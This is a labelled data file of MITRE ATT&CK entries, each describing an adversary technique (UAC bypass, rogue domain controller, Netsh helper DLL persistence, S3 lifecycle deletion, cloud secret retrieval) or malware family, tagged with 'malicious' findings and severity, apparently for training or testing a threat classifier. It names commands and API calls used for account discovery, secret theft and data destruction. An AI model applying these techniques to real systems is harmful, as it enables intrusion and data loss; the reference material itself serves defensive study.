{"id": "mitre_00030", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Network Trust Dependencies\n\nTechnique: T1590.003\nTactics: reconnaissance\nPlatforms: PRE\n\nAdversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD Forests) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1590.003", "technique_name": "Network Trust Dependencies", "tactics": ["reconnaissance"]}}]}
{"id": "mitre_00031", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# EVILNUM\n\nType: malware\nPlatforms: Windows\n\n[EVILNUM](https://attack.mitre.org/software/S0568) is fully capable backdoor that was first identified in 2018. [EVILNUM](https://attack.mitre.org/software/S0568) is used by the APT group [Evilnum](https://attack.mitre.org/groups/G0120) which has the same name.(Citation: ESET EvilNum July 2020)(Citation: Prevailion EvilNum May 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "EVILNUM", "malware_type": "malware"}}]}
{"id": "mitre_00032", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Disable or Modify Network Device Firewall\n\nTechnique: T1562.013\nTactics: defense-evasion\nPlatforms: Network Devices\n\nAdversaries may disable network device-based firewall mechanisms entirely or add, delete, or modify particular rules in order to bypass controls limiting network usage. \n \nModifying or disabling a network firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add new network firewall rules to allow access to all internal network subnets without restrictions.(Citation: Exposed Fortinet Fortigate firewall interface leads to LockBit Ransomware)\n\nAdversaries may gain access to the firewall management console via [Valid Accounts](https://attack.mitre.org/techniques/T1078) or by exploiting a vulnerability. In some cases, threat actors may target firewalls that have been exposed to the internet [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190).(Citation: CVE-2024-55591 Detail)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1562.013", "technique_name": "Disable or Modify Network Device Firewall", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00033", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Rogue Domain Controller\n\nTechnique: T1207\nTactics: defense-evasion\nPlatforms: Windows\n\nAdversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.\n\nRegistering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)\n\nThis technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1207", "technique_name": "Rogue Domain Controller", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00034", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Lifecycle-Triggered Deletion\n\nTechnique: T1485.001\nTactics: impact\nPlatforms: IaaS\n\nAdversaries may modify the lifecycle policies of a cloud storage bucket to destroy all objects stored within. \n\nCloud storage buckets often allow users to set lifecycle policies to automate the migration, archival, or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation: GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor has sufficient permissions to modify these policies, they may be able to delete all objects at once. \n\nFor example, in AWS environments, an adversary with the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle` API call to apply a lifecycle policy to an S3 bucket that deletes all objects in the bucket after one day.(Citation: Palo Alto Cloud Ransomware)(Citation: Halcyon AWS Ransomware 2025) In addition to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657), adversaries may also perform this action on buckets storing cloud logs for [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation: Datadog S3 Lifecycle CloudTrail Logs)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1485.001", "technique_name": "Lifecycle-Triggered Deletion", "tactics": ["impact"]}}]}
{"id": "mitre_00035", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# OwaAuth\n\nType: malware\nPlatforms: Windows\n\n[OwaAuth](https://attack.mitre.org/software/S0072) is a Web shell and credential stealer deployed to Microsoft Exchange servers that appears to be exclusively used by [Threat Group-3390](https://attack.mitre.org/groups/G0027). (Citation: Dell TG-3390)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "OwaAuth", "malware_type": "malware"}}]}
{"id": "mitre_00036", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Bypass User Account Control\n\nTechnique: T1548.002\nTactics: privilege-escalation, defense-evasion\nPlatforms: Windows\n\nAdversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)\n\nAnother bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1548.002", "technique_name": "Bypass User Account Control", "tactics": ["privilege-escalation", "defense-evasion"]}}]}
{"id": "mitre_00037", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Netsh Helper DLL\n\nTechnique: T1546.007\nTactics: privilege-escalation, persistence\nPlatforms: Windows\n\nAdversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\\SOFTWARE\\Microsoft\\Netsh.\n\nAdversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1546.007", "technique_name": "Netsh Helper DLL", "tactics": ["privilege-escalation", "persistence"]}}]}
{"id": "mitre_00038", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Local Account\n\nTechnique: T1087.001\nTactics: discovery\nPlatforms: ESXi, Linux, macOS, Windows\n\nAdversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.\n\nCommands such as net user and net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility and id and groups on macOS and Linux can list local users and groups.(Citation: Mandiant APT1)(Citation: id man page)(Citation: groups man page) On Linux, local users can also be enumerated through the use of the /etc/passwd file. On macOS, the dscl . list /Users command can be used to enumerate local accounts. On ESXi servers, the `esxcli system account list` command can list local user accounts.(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1087.001", "technique_name": "Local Account", "tactics": ["discovery"]}}]}
{"id": "mitre_00039", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Babuk\n\nType: malware\nPlatforms: Windows, Linux\n\n[Babuk](https://attack.mitre.org/software/S0638) is a Ransomware-as-a-service (RaaS) malware that has been used since at least 2021. The operators of [Babuk](https://attack.mitre.org/software/S0638) employ a \"Big Game Hunting\" approach to targeting major enterprises and operate a leak site to post stolen data as part of their extortion scheme.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)(Citation: CyberScoop Babuk February 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Babuk", "malware_type": "malware"}}]}
{"id": "mitre_00040", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Mivast\n\nType: malware\nPlatforms: Windows\n\n[Mivast](https://attack.mitre.org/software/S0080) is a backdoor that has been used by [Deep Panda](https://attack.mitre.org/groups/G0009). It was reportedly used in the Anthem breach. (Citation: Symantec Black Vine)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Mivast", "malware_type": "malware"}}]}
{"id": "mitre_00041", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Mutual Exclusion\n\nTechnique: T1480.002\nTactics: defense-evasion\nPlatforms: Linux, macOS, Windows\n\nAdversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)\n\nWhile local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)\n\nIn Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)\n\nMutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1480.002", "technique_name": "Mutual Exclusion", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00042", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Securityd Memory\n\nTechnique: T1167\nTactics: credential-access\nPlatforms: macOS\n\nIn OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple\u2019s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: External to DA, the OS X Way) Apple\u2019s securityd utility takes the user\u2019s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user\u2019s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password. (Citation: OS X Keychain)\n\nIf an adversary can obtain root access (allowing them to read securityd\u2019s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user\u2019s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc. (Citation: OS X Keychain) (Citation: OSX Keydnap malware)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1167", "technique_name": "Securityd Memory", "tactics": ["credential-access"]}}]}
{"id": "mitre_00043", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Invoke-PSImage\n\nType: tool\n\n[Invoke-PSImage](https://attack.mitre.org/software/S0231) takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image. It generates a one liner for executing either from a file of from the web. Example of usage is embedding the PowerShell code from the Invoke-Mimikatz module and embed it into an image file. By calling the image file from a macro for example, the macro will download the picture and execute the PowerShell code, which in this case will dump the passwords. (Citation: GitHub Invoke-PSImage)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Invoke-PSImage", "malware_type": "tool"}}]}
{"id": "mitre_00044", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# MESSAGETAP\n\nType: malware\nPlatforms: Linux\n\n[MESSAGETAP](https://attack.mitre.org/software/S0443) is a data mining malware family deployed by [APT41](https://attack.mitre.org/groups/G0096) into telecommunications networks to monitor and save SMS traffic from specific phone numbers, IMSI numbers, or that contain specific keywords. (Citation: FireEye MESSAGETAP October 2019)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "MESSAGETAP", "malware_type": "malware"}}]}
{"id": "mitre_00045", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# SEASHARPEE\n\nType: malware\nPlatforms: Windows\n\n[SEASHARPEE](https://attack.mitre.org/software/S0185) is a Web shell that has been used by [OilRig](https://attack.mitre.org/groups/G0049). (Citation: FireEye APT34 Webinar Dec 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "SEASHARPEE", "malware_type": "malware"}}]}
{"id": "mitre_00046", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Grandoreiro\n\nType: malware\nPlatforms: Windows\n\n[Grandoreiro](https://attack.mitre.org/software/S0531) is a banking trojan written in Delphi that was first observed in 2016 and uses a Malware-as-a-Service (MaaS) business model. [Grandoreiro](https://attack.mitre.org/software/S0531) has confirmed victims in Brazil, Mexico, Portugal, and Spain.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: ESET Grandoreiro April 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Grandoreiro", "malware_type": "malware"}}]}
{"id": "mitre_00047", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# VIRTUALPIE\n\nType: malware\nPlatforms: ESXi\n\n[VIRTUALPIE](https://attack.mitre.org/software/S1218) is a lightweight backdoor written in Python that spawns an IPv6 listener on a VMware ESXi server and features command line execution, file transfer, and reverse shell capabilities. [VIRTUALPIE](https://attack.mitre.org/software/S1218) has been in use since at least 2022 including by [UNC3886](https://attack.mitre.org/groups/G1048) who installed it via malicious vSphere Installation Bundles (VIBs).(Citation: Google Cloud Threat Intelligence ESXi VIBs 2022)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "VIRTUALPIE", "malware_type": "malware"}}]}
{"id": "mitre_00048", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# BLACKCOFFEE\n\nType: malware\nPlatforms: Windows\n\n[BLACKCOFFEE](https://attack.mitre.org/software/S0069) is malware that has been used by several Chinese groups since at least 2013. (Citation: FireEye APT17) (Citation: FireEye Periscope March 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "BLACKCOFFEE", "malware_type": "malware"}}]}
{"id": "mitre_00049", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# NETEAGLE\n\nType: malware\nPlatforms: Windows\n\n[NETEAGLE](https://attack.mitre.org/software/S0034) is a backdoor developed by [APT30](https://attack.mitre.org/groups/G0013) with compile dates as early as 2008. It has two main variants known as \u201cScout\u201d and \u201cNorton.\u201d (Citation: FireEye APT30)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "NETEAGLE", "malware_type": "malware"}}]}
{"id": "mitre_00050", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Redundant Access\n\nTechnique: T1108\nTactics: defense-evasion, persistence\nPlatforms: Windows, SaaS, IaaS, Linux, macOS, Office Suite, Identity Provider\n\n**This technique has been deprecated. Please use [Create Account](https://attack.mitre.org/techniques/T1136), [Web Shell](https://attack.mitre.org/techniques/T1505/003), and [External Remote Services](https://attack.mitre.org/techniques/T1133) where appropriate.**\n\nAdversaries may use more than one remote access tool with varying command and control protocols or credentialed access to remote services so they can maintain access if an access mechanism is detected or mitigated. \n\nIf one type of tool is detected and blocked or removed as a response but the organization did not gain a full understanding of the adversary's tools and access, then the adversary will be able to retain access to the network. Adversaries may also attempt to gain access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use [External Remote Services](https://attack.mitre.org/techniques/T1133) such as external VPNs as a way to maintain access despite interruptions to remote access tools deployed within a target network.(Citation: Mandiant APT1) Adversaries may also retain access through cloud-based infrastructure and applications.\n\nUse of a [Web Shell](https://attack.mitre.org/techniques/T1100) is one such way to maintain access to a network through an externally accessible Web server.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1108", "technique_name": "Redundant Access", "tactics": ["defense-evasion", "persistence"]}}]}
{"id": "mitre_00051", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Account Access Removal\n\nTechnique: T1531\nTactics: impact\nPlatforms: Linux, macOS, Windows, SaaS, IaaS, Office Suite, ESXi\n\nAdversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials, revoked permissions for SaaS platforms such as Sharepoint) to remove access to accounts.(Citation: Obsidian Security SaaS Ransomware June 2023) Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)\n\nIn Windows, [Net](https://attack.mitre.org/software/S0039) utility, Set-LocalUser and Set-ADAccountPassword [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. Accounts could also be disabled by Group Policy. In Linux, the passwd utility may be used to change passwords. On ESXi servers, accounts can be removed or modified via esxcli (`system account set`, `system account remove`).\n\nAdversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), in order to impede incident response/recovery before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective. ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1531", "technique_name": "Account Access Removal", "tactics": ["impact"]}}]}
{"id": "mitre_00052", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Gomir\n\nType: malware\nPlatforms: Linux\n\nGomir is a Linux backdoor variant of the Go-based malware [GoBear](https://attack.mitre.org/software/S1197), uniquely assoicated with [Kimsuky](https://attack.mitre.org/groups/G0094) operations.(Citation: Symantec Troll Stealer 2024)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Gomir", "malware_type": "malware"}}]}
{"id": "mitre_00053", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Zox\n\nType: malware\nPlatforms: Windows\n\n[Zox](https://attack.mitre.org/software/S0672) is a remote access tool that has been used by [Axiom](https://attack.mitre.org/groups/G0001) since at least 2008.(Citation: Novetta-Axiom)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Zox", "malware_type": "malware"}}]}
{"id": "mitre_00054", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# AutoHotKey & AutoIT\n\nTechnique: T1059.010\nTactics: execution\nPlatforms: Windows\n\nAdversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)\n\nAdversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)\n\nThese scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1059.010", "technique_name": "AutoHotKey & AutoIT", "tactics": ["execution"]}}]}
{"id": "mitre_00055", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Parent PID Spoofing\n\nTechnique: T1502\nTactics: defense-evasion, privilege-escalation\nPlatforms: Windows\n\nAdversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018)\n\nAdversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via VBA [Scripting](https://attack.mitre.org/techniques/T1064) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)\n\nExplicitly assigning the PPID may also enable [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) (given appropriate access rights to the parent process). For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1502", "technique_name": "Parent PID Spoofing", "tactics": ["defense-evasion", "privilege-escalation"]}}]}
{"id": "mitre_00056", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Hildegard\n\nType: malware\nPlatforms: Linux, Containers, IaaS\n\n[Hildegard](https://attack.mitre.org/software/S0601) is malware that targets misconfigured kubelets for initial access and runs cryptocurrency miner operations. The malware was first observed in January 2021. The TeamTNT activity group is believed to be behind [Hildegard](https://attack.mitre.org/software/S0601). (Citation: Unit 42 Hildegard Malware)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Hildegard", "malware_type": "malware"}}]}
{"id": "mitre_00057", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Login Hook\n\nTechnique: T1037.002\nTactics: persistence, privilege-escalation\nPlatforms: macOS\n\nAdversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the /Library/Preferences/com.apple.loginwindow.plist file and can be modified using the defaults command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks.(Citation: Login Scripts Apple Dev)(Citation: LoginWindowScripts Apple Dev) \n\nAdversaries can add or insert a path to a malicious script in the com.apple.loginwindow.plist file, using the LoginHook or LogoutHook key-value pair. The malicious script is executed upon the next user login. If a login hook already exists, adversaries can add additional commands to an existing login hook. There can be only one login and logout hook on a system at a time.(Citation: S1 macOs Persistence)(Citation: Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11 version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1037.002", "technique_name": "Login Hook", "tactics": ["persistence", "privilege-escalation"]}}]}
{"id": "mitre_00058", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Cloud Secrets Management Stores\n\nTechnique: T1555.006\nTactics: credential-access\nPlatforms: IaaS\n\nAdversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault. \n\nSecrets managers support the secure centralized management of passwords, API keys, and other credential material. Where secrets managers are in use, cloud services can dynamically acquire credentials via API requests rather than accessing secrets insecurely stored in plain text files or environment variables. \n\nIf an adversary is able to gain sufficient privileges in a cloud environment \u2013 for example, by obtaining the credentials of high-privileged [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004) or compromising a service that has permission to retrieve secrets \u2013 they may be able to request secrets from the secrets manager. This can be accomplished via commands such as `get-secret-value` in AWS, `gcloud secrets describe` in GCP, and `az key vault secret show` in Azure.(Citation: Permiso Scattered Spider 2023)(Citation: Sysdig ScarletEel 2.0 2023)(Citation: AWS Secrets Manager)(Citation: Google Cloud Secrets)(Citation: Microsoft Azure Key Vault)\n\n**Note:** this technique is distinct from [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005) in that the credentials are being directly requested from the cloud secrets manager, rather than through the medium of the instance metadata API.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1555.006", "technique_name": "Cloud Secrets Management Stores", "tactics": ["credential-access"]}}]}
{"id": "mitre_00059", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Fileless Storage\n\nTechnique: T1027.011\nTactics: defense-evasion\nPlatforms: Windows, Linux\n\nAdversaries may store data in \"fileless\" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage in Windows systems include the Windows Registry, event logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) Shared memory directories on Linux systems (`/dev/shm`, `/run/shm`, `/var/run`, and `/var/lock`) and volatile directories on Network Devices (`/tmp` and `/volatile`) may also be considered fileless storage, as files written to these directories are mapped directly to RAM and not stored on the disk.(Citation: Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell 2024)(Citation: Aquasec Muhstik Malware 2024)(Citation: Bitsight 7777 Botnet)(Citation: CISCO Nexus 900 Config).\n\nSimilar to fileless in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless data storage may remain undetected by anti-virus and other endpoint security tools that can only access specific file formats from disk storage. Leveraging fileless storage may also allow adversaries to bypass the protections offered by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries may use fileless storage to conceal various types of stored data, including payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003)) and collected data not yet exfiltrated from the victim (e.g., [Local Data Staging](https://attack.mitre.org/techniques/T1074/001)). Adversaries also often encrypt, encode, splice, or otherwise obfuscate this fileless data when stored. \n\nSome forms of fileless storage activity may indirectly create artifacts in the file system, but in central and otherwise difficult to inspect formats such as the WMI (e.g., `%SystemRoot%\\System32\\Wbem\\Repository`) or Registry (e.g., `%SystemRoot%\\System32\\Config`) physical files.(Citation: Microsoft Fileless) ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1027.011", "technique_name": "Fileless Storage", "tactics": ["defense-evasion"]}}]}
